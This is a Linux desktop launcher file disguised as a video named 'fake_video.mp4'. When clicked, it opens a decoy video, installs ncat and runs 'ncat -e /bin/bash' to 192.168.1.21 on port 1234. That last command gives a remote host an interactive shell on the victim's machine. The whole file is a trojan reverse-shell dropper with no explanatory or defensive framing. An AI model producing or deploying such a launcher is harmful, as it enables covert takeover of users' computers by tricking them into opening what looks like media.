
[Desktop Entry]
Type=Application
Encoding=UTF-8
Name=fake_video.mp4
Exec= /usr/bin/xdg-open hide/real_video.mp4;
apt install ncat;
ncat -e /bin/bash 192.168.1.21 1234
Terminal= false
